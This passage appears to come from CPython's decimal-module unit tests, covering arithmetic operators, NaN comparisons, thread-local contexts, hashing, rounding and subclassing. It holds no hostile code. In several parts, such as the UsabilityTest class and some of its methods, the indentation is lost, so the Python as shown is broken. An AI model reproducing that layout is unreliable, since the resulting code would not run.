        """'/' with two Decimals, Decimal/int on either side, and '/='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('-5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1/d2, Decimal('-2.5'))
        self.assertEqual(d2/d1, Decimal('-0.4'))

        #with other type, left
        c = d1 / 4
        self.assertEqual(c, Decimal('-1.25'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 4 / d1
        self.assertEqual(c, Decimal('-0.8'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 /= d2
        self.assertEqual(d1, Decimal('-2.5'))

        #inline with other type
        d1 /= 4
        self.assertEqual(d1, Decimal('-0.625'))

    def test_floor_division(self):
        """'//' with two Decimals, Decimal/int on either side, and '//='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1//d2, Decimal('2'))
        self.assertEqual(d2//d1, Decimal('0'))

        #with other type, left
        c = d1 // 4
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 // d1
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 //= d2
        self.assertEqual(d1, Decimal('2'))

        #inline with other type
        d1 //= 2
        self.assertEqual(d1, Decimal('1'))

    def test_powering(self):
        """'**' with two Decimals, Decimal/int on either side, and '**='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1**d2, Decimal('25'))
        self.assertEqual(d2**d1, Decimal('32'))

        #with other type, left
        c = d1 ** 4
        self.assertEqual(c, Decimal('625'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 ** d1
        self.assertEqual(c, Decimal('16807'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 **= d2
        self.assertEqual(d1, Decimal('25'))

        #inline with other type
        d1 **= 4
        self.assertEqual(d1, Decimal('390625'))

    def test_module(self):
        """'%' (modulo) with two Decimals, Decimal/int on either side, and '%='."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        self.assertEqual(d1%d2, Decimal('1'))
        self.assertEqual(d2%d1, Decimal('2'))

        #with other type, left
        c = d1 % 4
        self.assertEqual(c, Decimal('1'))
        self.assertEqual(type(c), type(d1))

        #with other type, right
        c = 7 % d1
        self.assertEqual(c, Decimal('2'))
        self.assertEqual(type(c), type(d1))

        #inline with decimal
        d1 %= d2
        self.assertEqual(d1, Decimal('1'))

        #inline with other type
        d1 %= 4
        self.assertEqual(d1, Decimal('1'))

    def test_floor_div_module(self):
        """divmod() with two Decimals and Decimal/int on either side;
        both results must be Decimals of the same type."""
        Decimal = self.decimal.Decimal

        d1 = Decimal('5')
        d2 = Decimal('2')

        #two Decimals
        (p, q) = divmod(d1, d2)
        self.assertEqual(p, Decimal('2'))
        self.assertEqual(q, Decimal('1'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

        #with other type, left
        (p, q) = divmod(d1, 4)
        self.assertEqual(p, Decimal('1'))
        self.assertEqual(q, Decimal('1'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

        #with other type, right
        (p, q) = divmod(7, d1)
        self.assertEqual(p, Decimal('1'))
        self.assertEqual(q, Decimal('2'))
        self.assertEqual(type(p), type(d1))
        self.assertEqual(type(q), type(d1))

    def test_unary_operators(self):
        """Unary +, - and abs()."""
        Decimal = self.decimal.Decimal

        self.assertEqual(+Decimal(45), Decimal(+45))           #  +
        self.assertEqual(-Decimal(45), Decimal(-45))           #  -
        self.assertEqual(abs(Decimal(45)), abs(Decimal(-45)))  # abs

    def test_nan_comparisons(self):
        # comparisons involving signaling nans signal InvalidOperation

        # order comparisons (<, <=, >, >=) involving only quiet nans
        # also signal InvalidOperation

        # equality comparisons (==, !=) involving only quiet nans
        # don't signal, but return False or True respectively.
        Decimal = self.decimal.Decimal
        InvalidOperation = self.decimal.InvalidOperation
        localcontext = self.decimal.localcontext

        n = Decimal('NaN')
        s = Decimal('sNaN')
        i = Decimal('Inf')
        f = Decimal('2')

        qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
        snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
        order_ops = operator.lt, operator.le, operator.gt, operator.ge
        equality_ops = operator.eq, operator.ne

        # results when InvalidOperation is not trapped
        for x, y in qnan_pairs + snan_pairs:
            for op in order_ops + equality_ops:
                got = op(x, y)
                expected = True if op is operator.ne else False
                self.assertIs(expected, got,
                              "expected {0!r} for operator.{1}({2!r}, {3!r}); "
                              "got {4!r}".format(
                                  expected, op.__name__, x, y, got))

        # repeat the above, but this time trap the InvalidOperation
        with localcontext() as ctx:
            ctx.traps[InvalidOperation] = 1

            for x, y in qnan_pairs:
                for op in equality_ops:
                    got = op(x, y)
                    expected = True if op is operator.ne else False
                    self.assertIs(expected, got,
                                  "expected {0!r} for "
                                  "operator.{1}({2!r}, {3!r}); "
                                  "got {4!r}".format(
                                      expected, op.__name__, x, y, got))

            for x, y in snan_pairs:
                for op in equality_ops:
                    self.assertRaises(InvalidOperation, operator.eq, x, y)
                    self.assertRaises(InvalidOperation, operator.ne, x, y)

            for x, y in qnan_pairs + snan_pairs:
                for op in order_ops:
                    self.assertRaises(InvalidOperation, op, x, y)

    def test_copy_sign(self):
        """copy_sign accepts a Decimal or an int as the sign source,
        but not a string."""
        Decimal = self.decimal.Decimal

        d = Decimal(1).copy_sign(Decimal(-2))
        self.assertEqual(Decimal(1).copy_sign(-2), d)
        self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Re-run the arithmetic-operator tests against the C implementation.
    decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Re-run the arithmetic-operator tests against the pure-Python implementation.
    decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
    # Worker 1 for ThreadingTest.test_threading.  `cls` is the test-case
    # instance, which carries the synchronization Events.  This thread keeps
    # the precision inherited from DefaultContext (24 digits) and checks it
    # is unaffected by thfunc2 setting prec=18 in *its* thread-local context.
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    cls.finish1.set()   # tell the main thread we have started
    cls.synchro.wait()  # wait until thfunc2 has changed its own context

    test2 = d1/d3
    # nested local contexts inherit flags from the enclosing context
    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
        cls.assertTrue(c2.flags[DivisionByZero])
        with localcontext() as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertTrue(c3.flags[DivisionByZero])
            cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
            cls.assertTrue(c3.flags[InvalidOperation])
            del c3
        # flags raised in the inner context must not leak outward
        cls.assertFalse(c2.flags[InvalidOperation])
        del c2

    # both quotients carry 24 digits: prec was never changed in this thread
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333333333'))

    c1 = getcontext()
    cls.assertTrue(c1.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
    # Worker 2 for ThreadingTest.test_threading.  Changes its own
    # thread-local context (prec=18) and then releases thfunc1 via
    # cls.synchro so thfunc1 can verify the change did not leak across
    # threads.
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3  # computed at the inherited prec=24

    thiscontext = getcontext()
    thiscontext.prec = 18
    test2 = d1/d3  # computed at the new prec=18

    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
        cls.assertTrue(c2.flags[Overflow])
        # an explicit context argument inherits from thiscontext, not c2
        with localcontext(thiscontext) as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertFalse(c3.flags[Overflow])
            c3.traps[Underflow] = True
            cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
            cls.assertTrue(c3.flags[Underflow])
            del c3
        # neither the flag nor the trap set in c3 may leak into c2
        cls.assertFalse(c2.flags[Underflow])
        cls.assertFalse(c2.traps[Underflow])
        del c2

    cls.synchro.set()  # release thfunc1
    cls.finish2.set()  # tell the main thread we are done

    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333'))

    cls.assertFalse(thiscontext.traps[Underflow])
    cls.assertTrue(thiscontext.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
    '''Unit tests for thread local contexts in Decimal.'''

    # Take care executing this test from IDLE, there's an issue in threading
    # that hangs IDLE and I couldn't find it

    def test_threading(self):
        """Each thread gets its own context (templated from DefaultContext);
        changes in one thread must not be visible in another."""
        DefaultContext = self.decimal.DefaultContext

        if self.decimal == C and not self.decimal.HAVE_THREADS:
            self.skipTest("compiled without threading")
        # Test the "threading isolation" of a Context. Also test changing
        # the DefaultContext, which acts as a template for the thread-local
        # contexts.
        save_prec = DefaultContext.prec
        save_emax = DefaultContext.Emax
        save_emin = DefaultContext.Emin
        DefaultContext.prec = 24
        DefaultContext.Emax = 425000000
        DefaultContext.Emin = -425000000

        self.synchro = threading.Event()
        self.finish1 = threading.Event()
        self.finish2 = threading.Event()

        th1 = threading.Thread(target=thfunc1, args=(self,))
        th2 = threading.Thread(target=thfunc2, args=(self,))

        th1.start()
        th2.start()

        self.finish1.wait()
        self.finish2.wait()

        # the worker threads must not have raised any flags on the template
        for sig in Signals[self.decimal]:
            self.assertFalse(DefaultContext.flags[sig])

        th1.join()
        th2.join()

        # restore the shared template context for subsequent tests
        DefaultContext.prec = save_prec
        DefaultContext.Emax = save_emax
        DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
    # Re-run the threading tests against the C implementation.
    decimal = C
class PyThreadingTest(ThreadingTest):
    # Re-run the threading tests against the pure-Python implementation.
    decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
    """Cross-type comparisons between Decimal and fractions.Fraction,
    including values beyond the context's exponent range and NaNs."""
    D = self.decimal.Decimal
    # pick the Fraction implementation matched to this decimal flavor
    F = fractions[self.decimal].Fraction
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation

    # use the widest exponent range the implementation supports
    emax = C.MAX_EMAX if C else 999999999
    emin = C.MIN_EMIN if C else -999999999
    etiny = C.MIN_ETINY if C else -1999999997
    c = Context(Emax=emax, Emin=emin)

    with localcontext(c):
        c.prec = emax
        self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
        self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
        self.assertLess(F(0,1), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,1))
        self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))

        self.assertEqual(D("0.1"), F(1,10))
        self.assertEqual(F(1,10), D("0.1"))

        c.prec = 300
        # 1/3 is inexact in Decimal, exact as a Fraction
        self.assertNotEqual(D(1)/3, F(1,3))
        self.assertNotEqual(F(1,3), D(1)/3)

        self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
        self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))

        self.assertGreater(D('inf'), F(99999999999,123))
        self.assertGreater(D('inf'), F(-99999999999,123))
        self.assertLess(D('-inf'), F(99999999999,123))
        self.assertLess(D('-inf'), F(-99999999999,123))
        # NaN ordering signals on the Decimal side; Fraction defers
        self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
        self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
        self.assertNotEqual(D('nan'), F(-9,123))
        self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
    """hash(Decimal) must equal the hash of any equal int/float and must
    not depend on the current context's precision."""
    Decimal = self.decimal.Decimal
    localcontext = self.decimal.localcontext

    def hashit(d):
        # hash() and __hash__() must agree
        a = hash(d)
        b = d.__hash__()
        self.assertEqual(a, b)
        return a

    #just that it's hashable
    hashit(Decimal(23))
    hashit(Decimal('Infinity'))
    hashit(Decimal('-Infinity'))
    hashit(Decimal('nan123'))
    hashit(Decimal('-NaN'))

    # integers around powers of two, plus assorted edge representations
    test_values = [Decimal(sign*(2**m + n))
                   for m in [0, 14, 15, 16, 17, 30, 31,
                             32, 33, 61, 62, 63, 64, 65, 66]
                   for n in range(-10, 10)
                   for sign in [-1, 1]]
    test_values.extend([
        Decimal("-1"), # ==> -2
        Decimal("-0"), # zeros
        Decimal("0.00"),
        Decimal("-0.000"),
        Decimal("0E10"),
        Decimal("-0E12"),
        Decimal("10.0"), # negative exponent
        Decimal("-23.00000"),
        Decimal("1230E100"), # positive exponent
        Decimal("-4.5678E50"),
        # a value for which hash(n) != hash(n % (2**64-1))
        # in Python pre-2.6
        Decimal(2**64 + 2**32 - 1),
        # selection of values which fail with the old (before
        # version 2.6) long.__hash__
        Decimal("1.634E100"),
        Decimal("90.697E100"),
        Decimal("188.83E100"),
        Decimal("1652.9E100"),
        Decimal("56531E100"),
    ])

    # check that hash(d) == hash(int(d)) for integral values
    for value in test_values:
        self.assertEqual(hashit(value), hashit(int(value)))

    #the same hash that to an int
    self.assertEqual(hashit(Decimal(23)), hashit(23))
    # signaling NaNs are unhashable
    self.assertRaises(TypeError, hash, Decimal('sNaN'))
    self.assertTrue(hashit(Decimal('Inf')))
    self.assertTrue(hashit(Decimal('-Inf')))

    # check that the hashes of a Decimal float match when they
    # represent exactly the same values
    test_strings = ['inf', '-Inf', '0.0', '-.0e1',
                    '34.0', '2.5', '112390.625', '-0.515625']
    for s in test_strings:
        f = float(s)
        d = Decimal(s)
        self.assertEqual(hashit(f), hashit(d))

    with localcontext() as c:
        # check that the value of the hash doesn't depend on the
        # current context (issue #1757)
        x = Decimal("123456789.1")

        c.prec = 6
        h1 = hashit(x)
        c.prec = 10
        h2 = hashit(x)
        c.prec = 16
        h3 = hashit(x)

        self.assertEqual(h1, h2)
        self.assertEqual(h1, h3)

        c.prec = 10000
        x = 1100 ** 1248
        self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
    """Numeric conversions: int(), float(), math.floor/ceil, and round()
    (one- and two-argument forms) on Decimals, including NaN/Inf errors."""
    Decimal = self.decimal.Decimal

    d1 = Decimal('66')
    d2 = Decimal('15.32')

    # int() truncates toward zero
    self.assertEqual(int(d1), 66)
    self.assertEqual(int(d2), 15)

    # float
    self.assertEqual(float(d1), 66)
    self.assertEqual(float(d2), 15.32)

    # floor: rounds toward negative infinity
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 3),
        ('3.899', 3),
        ('-2.3', -3),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812736),
        ]
    for d, i in test_pairs:
        self.assertEqual(math.floor(Decimal(d)), i)
    self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
    self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
    self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
    self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))

    # ceiling: rounds toward positive infinity
    test_pairs = [
        ('123.00', 123),
        ('3.2', 4),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812737),
        ]
    for d, i in test_pairs:
        self.assertEqual(math.ceil(Decimal(d)), i)
    self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
    self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))

    # round, single argument: banker's rounding (round-half-even)
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('-3.5', -4),
        ('-2.5', -2),
        ('-1.5', -2),
        ('-0.5', 0),
        ('0.5', 0),
        ('1.5', 2),
        ('2.5', 2),
        ('3.5', 4),
        ]
    for d, i in test_pairs:
        self.assertEqual(round(Decimal(d)), i)
    self.assertRaises(ValueError, round, Decimal('-NaN'))
    self.assertRaises(ValueError, round, Decimal('sNaN'))
    self.assertRaises(ValueError, round, Decimal('NaN123'))
    self.assertRaises(OverflowError, round, Decimal('Inf'))
    self.assertRaises(OverflowError, round, Decimal('-Inf'))

    # round, two arguments; this is essentially equivalent
    # to quantize, which is already extensively tested
    test_triples = [
        ('123.456', -4, '0E+4'),
        ('123.456', -3, '0E+3'),
        ('123.456', -2, '1E+2'),
        ('123.456', -1, '1.2E+2'),
        ('123.456', 0, '123'),
        ('123.456', 1, '123.5'),
        ('123.456', 2, '123.46'),
        ('123.456', 3, '123.456'),
        ('123.456', 4, '123.4560'),
        ('123.455', 2, '123.46'),
        ('123.445', 2, '123.44'),
        ('Inf', 4, 'NaN'),
        ('-Inf', -23, 'NaN'),
        ('sNaN314', 3, 'NaN314'),
        ]
    for d, n, r in test_triples:
        self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
    """as_tuple() returns (sign, digits, exponent); special values use the
    'F'/'n'/'N' exponent markers, with per-case leading-zero handling."""
    Decimal = self.decimal.Decimal

    # with zero
    d = Decimal(0)
    self.assertEqual(d.as_tuple(), (0, (0,), 0) )

    # int
    d = Decimal(-45)
    self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )

    # complicated string
    d = Decimal("-4.34913534E-17")
    self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )

    # The '0' coefficient is implementation specific to decimal.py.
    # It has no meaning in the C-version and is ignored there.
    d = Decimal("Infinity")
    self.assertEqual(d.as_tuple(), (0, (0,), 'F') )

    # leading zeros in coefficient should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
    d = Decimal( (1, (0, 0, 0), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))
    d = Decimal( (1, (), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))

    # leading zeros in NaN diagnostic info should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
    d = Decimal( (1, (0, 0, 0), 'N') )
    self.assertEqual(d.as_tuple(), (1, (), 'N') )
    d = Decimal( (1, (), 'n') )
    self.assertEqual(d.as_tuple(), (1, (), 'n') )

    # For infinities, decimal.py has always silently accepted any
    # coefficient tuple.
    d = Decimal( (0, (0,), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (0, (4, 5, 3, 4), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (1, (0, 2, 7, 1), 'F') )
    self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
    """Arithmetic on Decimal subclasses returns plain Decimal; copy/deepcopy
    preserve the subclass; construction converts between the two types."""
    # Different behaviours when subclassing Decimal
    Decimal = self.decimal.Decimal

    class MyDecimal(Decimal):
        y = None

    d1 = MyDecimal(1)
    d2 = MyDecimal(2)
    # operators and context methods downcast to plain Decimal
    d = d1 + d2
    self.assertIs(type(d), Decimal)

    d = d1.max(d2)
    self.assertIs(type(d), Decimal)

    # copy/deepcopy keep the subclass and value
    d = copy.copy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    d = copy.deepcopy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    # Decimal(Decimal)
    d = Decimal('1.0')
    x = Decimal(d)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(Decimal)
    m = MyDecimal(d)
    self.assertIs(type(m), MyDecimal)
    self.assertEqual(m, d)
    self.assertIs(m.y, None)

    # Decimal(MyDecimal)
    x = Decimal(m)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(MyDecimal): instance attributes are not copied over
    m.y = 9
    x = MyDecimal(m)
    self.assertIs(type(x), MyDecimal)
    self.assertEqual(x, d)
    self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
    """Passing context=None (or rounding=None) must behave exactly like
    omitting the argument: the operation uses the current thread context
    (and its rounding), and flags accumulate on that context."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation
    DivisionByZero = self.decimal.DivisionByZero
    Overflow = self.decimal.Overflow
    Underflow = self.decimal.Underflow
    Subnormal = self.decimal.Subnormal
    Inexact = self.decimal.Inexact
    Rounded = self.decimal.Rounded
    Clamped = self.decimal.Clamped

    with localcontext(Context()) as c:
        c.prec = 7
        c.Emax = 999
        c.Emin = -999

        x = Decimal("111")      # ordinary finite value
        y = Decimal("1e9999")   # overflows at Emax=999
        z = Decimal("1e-9999")  # subnormal/underflows at Emin=-999

        ##### Unary functions
        c.clear_flags()
        self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(Overflow, y.exp, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertIs(z.is_normal(context=None), False)
        self.assertIs(z.is_subnormal(context=None), True)

        c.clear_flags()
        self.assertEqual(str(x.ln(context=None)), '4.709530')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.log10(context=None)), '2.045323')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.logb(context=None)), '2')
        self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
        self.assertTrue(c.flags[DivisionByZero])

        c.clear_flags()
        self.assertEqual(str(x.logical_invert(context=None)), '1111000')
        self.assertRaises(InvalidOperation, y.logical_invert, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(z.normalize(context=None)), '0')
        self.assertRaises(Overflow, y.normalize, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertEqual(str(z.number_class(context=None)), '+Subnormal')

        c.clear_flags()
        self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
        self.assertTrue(c.flags[Clamped])
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        self.assertTrue(c.flags[Subnormal])
        self.assertTrue(c.flags[Underflow])
        c.clear_flags()
        self.assertRaises(Overflow, y.sqrt, context=None)
